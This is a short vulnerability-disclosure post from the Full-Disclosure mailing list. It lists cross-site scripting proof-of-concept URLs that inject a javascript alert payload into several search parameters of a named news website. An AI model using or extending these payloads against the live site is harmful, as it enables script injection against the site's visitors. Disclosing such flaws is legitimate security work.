###########################-XSS-############################### http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=XSS%22%20style=%22background:url(javascript:alert('XSS'))&s=recent&r=&d1=yesterday&d2=today&q= http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=XSS%22%20style=%22background:url(javascript:alert('XSS'))&s=recent&r=&q= http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=XSS%22%20style=%22background:url(javascript:alert('XSS'))&r=&d1=yesterday&d2=today&q= http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=XSS%22%20style=%22background:url(javascript:alert('XSS'))&r=&q= http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=recent&r=XSS%22%20style=%22background:url(javascript:alert('XSS'))&d1=yesterday&d2=today&q= http://jg-tc.com/shared-content/search/index.php?search=go&o=0&l=20&s=recent&r=XSS%22%20style=%22background:url(javascript:alert('XSS'))&q= http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=XSS%22%20style=%22background:url(javascript:alert('XSS'))&s=recent&d1=yesterday&d2=today http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=20&s=XSS%22%20style=%22background:url(javascript:alert('XSS'))&d1=yesterday&d2=today http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=20&s=recent&d1=XSS%22%20style=%22background:url(javascript:alert('XSS'))&d2=today http://jg-tc.com/shared-content/search/index.php?search=date&o=0&l=20&s=recent&d1=yesterday&d2=XSS%22%20style=%22background:url(javascript:alert('XSS')) Discovered by Jeff Peadro jeff.peadro [at] gmail . com ###########################-XSS-############################### _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/